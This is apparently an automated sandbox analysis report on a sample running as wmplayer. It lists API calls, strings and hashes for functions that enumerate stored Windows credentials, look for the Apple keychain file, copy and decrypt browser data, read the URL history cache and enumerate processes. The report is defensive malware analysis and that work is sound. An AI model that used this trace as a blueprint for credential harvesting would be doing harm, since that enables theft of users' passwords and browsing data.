                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 1690352074-0
                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3558857096-0
                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph (rendered graph omitted): function 0044553B, basic blocks 0044553B-00445FB2. APIs on the graph: memset, wcsrchr, _wcsicmp. Subcalls include 0044DB70, 0040C768, 0040BDB0, 004135F7, 00444B06, 004136C0, 0041366B, 00403988, 0040A889, 00403E2D, 00403C9C, 00414C2E, 0040B2CC, 00409D1F, 00409B98, 0040B6EF, 00403FBE, 0040B1AB, 004087B3, 004454BF, 0040A9B5, 0040AE18, 0040AE51, 004099C6, 00445403, 00445389, 00409C52, 00445093, 00413CFA, 00413D4C, 00413FA6, 00409C70, 00413D29, 0040AEBE, 0040ADD4.
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                            • memset.MSVCRT ref: 00445725
                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                            • memset.MSVCRT ref: 00445755
                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                            • memset.MSVCRT ref: 00445986
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                            • API String ID: 2263259095-3798722523
                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                            • API String ID: 2744995895-28296030
                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                            • String ID: chp$v10
                                                                                            • API String ID: 4165125987-2783969131
                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E49A
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                            • API String ID: 3849927982-2252543386
                                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                            • String ID:
                                                                                            • API String ID: 3715365532-3916222277
                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                            • API String ID: 1344430650-1740548384
                                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                            • String ID: bhv
                                                                                            • API String ID: 4234240956-2689659898
                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2941347001-70141382
                                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                            • String ID:
                                                                                            • API String ID: 2827331108-0
                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                            • String ID: visited:
                                                                                            • API String ID: 1157525455-1702587658
                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                            • API String ID: 2804212203-2982631422
                                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
